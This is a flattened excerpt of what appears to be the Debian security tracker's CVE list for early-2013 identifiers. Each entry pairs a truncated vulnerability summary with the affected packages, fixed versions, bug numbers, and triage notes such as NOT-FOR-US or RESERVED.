NOT-FOR-US: Mac OS X CVE-2013-0970 (Messages in Apple Mac OS X before 10.8.3 allows remote attackers to ...) NOT-FOR-US: Mac OS X CVE-2013-0969 (Login Window in Apple Mac OS X before 10.8.3 does not prevent ...) NOT-FOR-US: Mac OS X CVE-2013-0968 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0967 (CoreTypes in Apple Mac OS X before 10.8.3 includes JNLP files in the ...) NOT-FOR-US: Mac OS X CVE-2013-0966 (The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac ...) NOT-FOR-US: Apple mod_hfs_apple CVE-2013-0965 RESERVED CVE-2013-0964 (The kernel in Apple iOS before 6.1 and Apple TV before 5.2 does not ...) - webkit (bug #700164) CVE-2013-0963 (Identity Services in Apple iOS before 6.1 does not properly handle ...) NOT-FOR-US: Identity Services in Apple iOS CVE-2013-0962 (Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before ...) - webkit (bug #700164) CVE-2013-0961 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0960 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-0959 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0958 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0957 RESERVED CVE-2013-0956 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0955 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0954 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0953 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0952 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0951 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0950 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0949 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0948 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...) - webkit (bug #700164) CVE-2013-0947 RESERVED CVE-2013-0946 (Buffer overflow in the Library Control Program (LCP) in EMC AlphaStor ...) NOT-FOR-US: EMC CVE-2013-0945 (EMC Avamar Client before 6.1.101-89 does not verify that the server ...) NOT-FOR-US: EMC Avamar CVE-2013-0944 (The web-based file-restore interface in EMC Avamar Server before 6.1.0 ...) NOT-FOR-US: EMC Avamar CVE-2013-0943 RESERVED CVE-2013-0942 RESERVED CVE-2013-0941 RESERVED CVE-2013-0940 (The nsrpush process in the client in EMC NetWorker before 7.6.5.3 and ...) NOT-FOR-US: EMC NetWorker CVE-2013-0939 (EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, ...) NOT-FOR-US: EMC CVE-2013-0938 (Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop ...) NOT-FOR-US: EMC CVE-2013-0937 (Session fixation vulnerability in EMC Documentum Webtop before 6.7 ...) NOT-FOR-US: EMC CVE-2013-0936 (Cross-site scripting (XSS) vulnerability in EMC Smarts IP Manager, ...) NOT-FOR-US: EMC CVE-2013-0935 (EMC Smarts Network Configuration Manager (NCM) before 9.2 does not ...) NOT-FOR-US: EMC CVE-2013-0934 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...) NOT-FOR-US: EMC CVE-2013-0933 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...) NOT-FOR-US: EMC CVE-2013-0932 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...) NOT-FOR-US: EMC CVE-2013-0931 (EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not ...) NOT-FOR-US: EMC RSA CVE-2013-0930 (Buffer overflow in Drive Control Program (DCP) in EMC AlphaStor 4.0 ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0929 (Format string vulnerability in the _vsnsprintf function in rrobotd.exe ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0928 (The NetWorker command processor in rrobotd.exe in the Device Manager ...) NOT-FOR-US: EMC AlphaStor CVE-2013-0927 (Google Chrome OS before 26.0.1410.57 relies on a Pango pango-utils.c ...) NOT-FOR-US: Chrome OS CVE-2013-0926 (Google Chrome before 26.0.1410.43 does not properly handle active ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0925 (Google Chrome before 26.0.1410.43 does not ensure that an extension ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0924 (The extension functionality in Google Chrome before 26.0.1410.43 does ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0923 (The USB Apps API in Google Chrome before 26.0.1410.43 allows remote ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0922 (Google Chrome before 26.0.1410.43 does not properly restrict ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0921 (The Isolated Sites feature in Google Chrome before 26.0.1410.43 does ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0920 (Use-after-free vulnerability in the extension bookmarks API in Google ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0919 (Use-after-free vulnerability in Google Chrome before 26.0.1410.43 on ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0918 (Google Chrome before 26.0.1410.43 does not prevent navigation to ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0917 (The URL loader in Google Chrome before 26.0.1410.43 allows remote ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0916 (Use-after-free vulnerability in the Web Audio implementation in Google ...) - chromium-browser 26.0.1410.43-1 CVE-2013-0915 (The GPU process in Google Chrome OS before 25.0.1364.173 allows ...) NOT-FOR-US: Overflow in Chrome-specific libs CVE-2013-0914 (The flush_signal_handlers function in kernel/signal.c in the Linux ...) {DSA-2668-1} - linux 3.2.41-1 (low) - linux-2.6 (low) CVE-2013-0913 (Integer overflow in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Vulnerable code was introduced later) CVE-2013-0912 (WebKit in Google Chrome before 25.0.1364.160 allows remote attackers ...) - chromium-browser 25.0.1364.160-1 CVE-2013-0911 (Directory traversal vulnerability in Google Chrome before ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0910 (Google Chrome before 25.0.1364.152 does not properly manage the ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0909 (The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0908 (Google Chrome before 25.0.1364.152 does not properly manage bindings ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0907 (Race condition in Google Chrome before 25.0.1364.152 allows remote ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0906 (The IndexedDB implementation in Google Chrome before 25.0.1364.152 ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0905 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0904 (The Web Audio implementation in Google Chrome before 25.0.1364.152 ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0903 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0902 (Use-after-free vulnerability in the frame-loader implementation in ...) - chromium-browser 25.0.1364.152-1 CVE-2013-0901 RESERVED CVE-2013-0900 (Race condition in the International Components for Unicode (ICU) ...) - chromium-browser 25.0.1364.97-1 - icu 4.8.1.1-12 (low; bug #702346) [squeeze] - icu (Minor issue) CVE-2013-0899 (Integer overflow in the padding implementation in the ...) - chromium-browser 25.0.1364.97-1 - opus 0.9.14+20120615-1+nmu1 (bug #704870) CVE-2013-0898 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0897 (Off-by-one error in the PDF functionality in Google Chrome before ...) - chromium-browser (PDF viewer not included in Chromium) CVE-2013-0896 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0895 (Google Chrome before 25.0.1364.97 on Linux, and before 25.0.1364.99 on ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0894 (Buffer overflow in the vorbis_parse_setup_hdr_floors function in the ...) - chromium-browser 25.0.1364.97-1 - ffmpeg - libav 6:0.8.6-1 (bug #703200) CVE-2013-0893 (Race condition in Google Chrome before 25.0.1364.97 on Windows and ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0892 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0891 (Integer overflow in Google Chrome before 25.0.1364.97 on Windows and ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0890 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0889 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0888 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0887 (The developer-tools process in Google Chrome before 25.0.1364.97 on ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0886 (Google Chrome before 25.0.1364.99 on Mac OS X does not properly ...) - chromium-browser (Mac OS X only) CVE-2013-0885 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0884 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0883 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0882 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0881 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0880 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0879 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...) - chromium-browser 25.0.1364.97-1 CVE-2013-0878 RESERVED CVE-2013-0877 RESERVED CVE-2013-0876 RESERVED CVE-2013-0875 RESERVED CVE-2013-0874 RESERVED CVE-2013-0873 RESERVED CVE-2013-0872 RESERVED CVE-2013-0871 (Race condition in the ptrace functionality in the Linux kernel before ...) {DSA-2632-1} - linux 3.2.39-1 - linux-2.6 CVE-2013-0870 RESERVED CVE-2013-0869 RESERVED CVE-2013-0868 RESERVED CVE-2013-0867 RESERVED CVE-2013-0866 RESERVED CVE-2013-0865 RESERVED CVE-2013-0864 RESERVED CVE-2013-0863 RESERVED CVE-2013-0862 RESERVED CVE-2013-0861 RESERVED CVE-2013-0860 RESERVED CVE-2013-0859 RESERVED CVE-2013-0858 RESERVED CVE-2013-0857 RESERVED CVE-2013-0856 RESERVED CVE-2013-0855 RESERVED CVE-2013-0854 RESERVED CVE-2013-0853 RESERVED CVE-2013-0852 RESERVED CVE-2013-0851 RESERVED CVE-2013-0850 RESERVED CVE-2013-0849 RESERVED CVE-2013-0848 RESERVED CVE-2013-0847 RESERVED CVE-2013-0846 RESERVED CVE-2013-0845 RESERVED CVE-2013-0844 RESERVED CVE-2013-0843 (content/renderer/media/webrtc_audio_renderer.cc in Google Chrome ...) - chromium-browser (MacOS-specific) CVE-2013-0842 (Google Chrome before 24.0.1312.56 does not properly handle %00 ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0841 (Array index error in the content-blocking functionality in Google ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0840 (Google Chrome before 24.0.1312.56 does not validate URLs during the ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0839 (Use-after-free vulnerability in Google Chrome before 24.0.1312.56 ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0838 (Google Chrome before 24.0.1312.52 on Linux uses weak permissions for ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0837 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0836 (Google V8 before 3.14.5.3, as used in Google Chrome before ...) - chromium-browser 24.0.1312.68-1 - libv8 (bug #702261; vulnerablility was fixed by reverting to old implementation as found in version 3.8.9.20) TODO: re-check uploads newer than 3.8.9.20 CVE-2013-0835 (Unspecified vulnerability in the Geolocation implementation in Google ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0834 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0833 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0832 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0831 (Directory traversal vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0830 (The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a ...) - chromium-browser (Only affects Windows) CVE-2013-0829 (Google Chrome before 24.0.1312.52 does not properly maintain database ...) - chromium-browser 24.0.1312.68-1 CVE-2013-0828 (The PDF functionality in Google Chrome before 24.0.1312.52 does not ...) - chromium-browser (PDF functionality not available in Chromium) CVE-2012-6498 (Unrestricted file upload vulnerability in index.php in Atomymaxsite ...) NOT-FOR-US: Atomymaxsite CVE-2013-0827 RESERVED CVE-2013-0826 RESERVED CVE-2013-0825 RESERVED CVE-2013-0824 RESERVED CVE-2013-0823 RESERVED CVE-2013-0822 RESERVED CVE-2013-0821 RESERVED CVE-2013-0820 RESERVED CVE-2013-0819 RESERVED CVE-2013-0818 RESERVED CVE-2013-0817 RESERVED CVE-2013-0816 RESERVED CVE-2013-0815 RESERVED CVE-2013-0814 RESERVED CVE-2013-0813 RESERVED CVE-2013-0812 RESERVED CVE-2013-0811 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0810 RESERVED CVE-2013-0809 (Unspecified vulnerability in the 2D component in the Java Runtime ...) - openjdk-6 6b27-1.12.4-1 - openjdk-7 7u3-2.1.7-1 CVE-2013-0808 RESERVED CVE-2013-0807 RESERVED CVE-2013-0806 RESERVED CVE-2013-0805 RESERVED CVE-2013-0804 (The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before ...) NOT-FOR-US: GroupWise CVE-2013-0803 RESERVED CVE-2012-6497 (The Authlogic gem for Ruby on Rails, when used with certain versions ...) {DSA-2597-1} - ruby-activerecord-3.2 3.2.6-3 - ruby-activerecord-2.3 2.3.14-3 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2012-6496 (SQL injection vulnerability in the Active Record component in Ruby on ...) {DSA-2597-1} - ruby-activerecord-3.2 3.2.6-3 - ruby-activerecord-2.3 2.3.14-3 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-0802 RESERVED CVE-2013-0801 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 17.0.6esr-1 - icedove - iceape CVE-2013-0800 (Integer signedness error in the pixman_fill_sse2 function in ...) - iceweasel 17.0.5esr-1 - icedove 17.0.5-1 - iceape - wine-gecko-1.4 (unimportant) NOTE: The description is misleading: Firefox embeds a copy of Cairo, the interdiff NOTE: shows the respective change at mozilla-esr17/gfx/cairo/cairo/src/cairo-image-surface.c NOTE: Apparently the forked copy has changed, the code isn't present in vanilla Cairo CVE-2013-0799 (Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox ...) - iceweasel (Only affects Firefox on Windows) CVE-2013-0798 (Mozilla Firefox before 20.0 on Android uses world-writable and ...) - iceweasel (Only affects Firefox on Android) CVE-2013-0797 (Untrusted search path vulnerability in the Mozilla Updater in Mozilla ...) - iceweasel (Only affects Firefox on Windows) CVE-2013-0796 (The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x ...) - iceweasel 17.0.5esr-1 - icedove 17.0.5-1 - iceape CVE-2013-0795 (The System Only Wrapper (SOW) implementation in Mozilla Firefox before ...) - icedove - iceape - iceweasel 17.0.5esr-1 CVE-2013-0794 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17 do not prevent ...) - iceweasel 17.0.5esr-1 (low) - iceape (low) CVE-2013-0793 (Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, ...) - iceweasel 17.0.5esr-1 - icedove 17.0.5-1 - iceape CVE-2013-0792 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17, when ...) - iceweasel 17.0.5esr-1 (low) - iceape (low) CVE-2013-0791 (The CERT_DecodeCertPackage function in Mozilla Network Security ...) - nss 2:3.14.3-1 (unimportant) NOTE: client crash only CVE-2013-0790 (Unspecified vulnerability in the browser engine in Mozilla Firefox ...) - iceweasel (Only affects Firefox on Android) CVE-2013-0789 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 19) - icedove (Only affects Firefox 19) - iceape (Only affects Firefox 19) CVE-2013-0788 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 17.0.5esr-1 - iceape - icedove 17.0.5-1 CVE-2013-0787 (Use-after-free vulnerability in the nsEditor::IsPreformatted function ...) - iceweasel 17.0.5esr-1 - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0.2-1, update when enters unstable CVE-2013-0786 (The Bugzilla::Search::build_subselect function in Bugzilla 2.x and 3.x ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2013-0785 (Cross-site scripting (XSS) vulnerability in show_bug.cgi in Bugzilla ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2013-0784 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0783 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 17.0.5esr-1 (bug #703071) - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0-1, update when enters unstable CVE-2013-0782 (Heap-based buffer overflow in the nsSaveAsCharset::DoCharsetConversion ...) - iceweasel 17.0.5esr-1 (bug #703071) - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0-1, update when enters unstable CVE-2013-0781 (Use-after-free vulnerability in the nsPrintEngine::CommonPrint ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0780 (Use-after-free vulnerability in the ...) - iceweasel 17.0.5esr-1 (bug #703071) - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0-1, update when enters unstable CVE-2013-0779 (The nsCodingStateMachine::NextState function in Mozilla Firefox before ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0778 (The ClusterIterator::NextCluster function in Mozilla Firefox before ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0777 (Use-after-free vulnerability in the nsDisplayBoxShadowOuter::Paint ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0776 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, ...) - iceweasel 17.0.5esr-1 (bug #703071) - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0-1, update when enters unstable CVE-2013-0775 (Use-after-free vulnerability in the ...) - iceweasel 17.0.5esr-1 (bug #703071) - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0-1, update when enters unstable CVE-2013-0774 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, ...) - iceape (Introduced in Firefox 15) - iceweasel (Introduced in Firefox 15) - icedove (Introduced in Firefox 15) CVE-2013-0773 (The Chrome Object Wrapper (COW) and System Only Wrapper (SOW) ...) - iceweasel 17.0.5esr-1 (bug #703071) - icedove 17.0.5-1 - iceape NOTE: Fixed in experimental in 19.0-1, update when enters unstable CVE-2013-0772 (The RasterImage::DrawFrameTo function in Mozilla Firefox before 19.0, ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0771 (Heap-based buffer overflow in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0770 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0769 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0768 (Stack-based buffer overflow in the Canvas implementation in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0767 (The nsSVGPathElement::GetPathLengthScale function in Mozilla Firefox ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0766 (Use-after-free vulnerability in the ~nsHTMLEditRules implementation in ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0765 (Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0764 (The nsSOCKSSocketInfo::ConnectToProxy function in Mozilla Firefox ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0763 (Use-after-free vulnerability in Mozilla Firefox before 18.0, Firefox ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0762 (Use-after-free vulnerability in the imgRequest::OnStopFrame function ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0761 (Use-after-free vulnerability in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0760 (Buffer overflow in the CharDistributionAnalysis::HandleOneChar ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0759 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0758 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0757 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0756 (Use-after-free vulnerability in the obj_toSource function in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0755 (Use-after-free vulnerability in the mozVibrate implementation in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0754 (Use-after-free vulnerability in the ListenerManager implementation in ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0753 (Use-after-free vulnerability in the serializeToStream implementation ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0752 (Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0751 (Mozilla Firefox before 18.0 on Android and SeaMonkey before 2.15 do ...) - iceape (Android-specific) - iceweasel (Android-specific) - icedove (Android-specific) CVE-2013-0750 (Integer overflow in the JavaScript implementation in Mozilla Firefox ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0749 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0748 (The XBL.__proto__.toString implementation in Mozilla Firefox before ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0747 (The gPluginHandler.handleEvent function in the plugin handler in ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0746 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0745 (The AutoWrapperChanger class in Mozilla Firefox before 18.0, Firefox ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2013-0744 (Use-after-free vulnerability in the ...) - iceweasel 10.0.12esr-1 - icedove 10.0.12-1 - iceape 2.7.12-1 CVE-2013-0743 [nss: Dis-trust TURKTRUST mis-issued *.google.com certificate] REJECTED {DSA-2599-1} - nss 2:3.14.1.with.ckbi.1.93-1 [wheezy] - nss 2:3.13.6-2 NOTE: http://googleonlinesecurity.blogspot.in/2013/01/enhancing-digital-certificate-security.html NOTE: https://blog.mozilla.org/security/2013/01/03/revoking-trust-in-two-turktrust-certficates/ CVE-2013-0742 RESERVED CVE-2013-0741 RESERVED CVE-2013-0740 RESERVED CVE-2013-0739 RESERVED CVE-2013-0738 RESERVED CVE-2013-0737 RESERVED CVE-2013-0736 RESERVED CVE-2013-0735 RESERVED CVE-2013-0734 RESERVED CVE-2013-0733 RESERVED CVE-2013-0732 RESERVED CVE-2013-0731 (ajax.functions.php in the MailUp plugin before 1.3.3 for WordPress ...) NOT-FOR-US: MailUp plugin for Wordpress CVE-2013-0730 (Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x ...) NOT-FOR-US: Newscoop CVE-2013-0729 RESERVED CVE-2013-0728 (Multiple stack-based buffer overflows in NCSAddOn.dll in the ERDAS ...) NOT-FOR-US: ERDAS ECWP Browser Plugin CVE-2013-0727 (Multiple untrusted search path vulnerabilities in Global Mapper 14.1.0 ...) NOT-FOR-US: Global Mapper CVE-2013-0726 (Stack-based buffer overflow in the ERM_convert_to_correct_webpath ...) NOT-FOR-US: ERDAS ER Viewer CVE-2013-0725 RESERVED CVE-2013-0724 RESERVED CVE-2013-0723 RESERVED CVE-2013-0722 (Stack-based buffer overflow in the scan_load_hosts function in ...) - ettercap 1:0.7.5.1-2 (low; bug #697987) [squeeze] - ettercap 1:0.7.3-2.1+squeeze1 NOTE: http://www.openwall.com/lists/oss-security/2013/01/10/2 NOTE: http://www.exploit-db.com/exploits/23945/ NOTE: https://secunia.com/advisories/51731/ NOTE: Proposed patch http://www.securation.com/files/2013/01/ec.patch CVE-2012-6495 (Multiple directory traversal vulnerabilities in the (1) twikidraw ...) {DSA-2593-1} - moin 1.9.5-3 [wheezy] - moin 1.9.4-8+deb7u1 CVE-2012-6494 RESERVED CVE-2012-6493 RESERVED CVE-2012-6492 RESERVED CVE-2012-6491 RESERVED CVE-2012-6490 RESERVED CVE-2012-6489 RESERVED CVE-2012-6488 RESERVED CVE-2012-6487 RESERVED CVE-2012-6486 RESERVED CVE-2012-6485 RESERVED CVE-2012-6484 RESERVED CVE-2012-6483 RESERVED CVE-2012-6482 RESERVED CVE-2012-6481 RESERVED CVE-2012-6480 RESERVED CVE-2012-6479 RESERVED CVE-2012-6478 RESERVED CVE-2012-6477 RESERVED CVE-2012-6476 RESERVED CVE-2012-6475 RESERVED CVE-2012-6474 RESERVED CVE-2012-6473 RESERVED CVE-2013-0721 